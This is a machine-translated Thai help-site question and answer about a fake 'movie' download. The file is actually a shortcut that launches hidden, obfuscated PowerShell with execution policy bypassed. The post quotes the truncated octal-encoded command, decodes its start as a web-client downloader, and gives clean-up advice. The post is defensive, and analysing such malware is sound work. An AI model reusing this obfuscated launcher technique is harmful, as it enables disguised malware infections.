คำถามนี้มีคำตอบอยู่ที่นี่แล้ว:
ใน Windows 10 ฉันดาวน์โหลดไฟล์นี้ที่ฉันคิดว่าเป็นภาพยนตร์ แต่มันตัดสั้นขนาด 700MB
ฉันเห็นว่าเป้าหมายคือสิ่งนี้
C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr --WINd 1 -eXEc ByP ($ pshOmE [4] + $ PShoMe [30] + 'X') (-JoiN ((44, 141, 163,160, 170, 40, 75, 40, 50,50, 116, 145, 167,55, 117, 142, 152,145, 143, 164,40,123, 171,163,164, 145,155,56, 116
และมันถูกตั้งค่าให้เริ่มต้นที่
% systemroot% \ System32 \ WindowsPowerShell \ v1.0
มันทำอะไร?
$aspx = ((New-Object System.N
แต่จะต้องมีสิ่งเหล่านี้อีกมากเพื่อให้สามารถทำงานในสิ่งที่ตั้งใจจะทำ หากได้ติดตั้งโทรจันเช่นตัวบันทึกคีย์แล้วคุณจะไม่ทราบว่ามีอยู่ ตัดการเชื่อมต่อจากอินเทอร์เน็ตรีสตาร์ท (ไม่ใช่รีบูต) และเรียกใช้การสแกนไวรัสแบบเต็ม (รวมถึงการสแกนรูทคิท) อาจมีการติดเชื้อระบบอื่นในเครือข่ายของคุณทั้งนี้ขึ้นอยู่กับลักษณะของมัน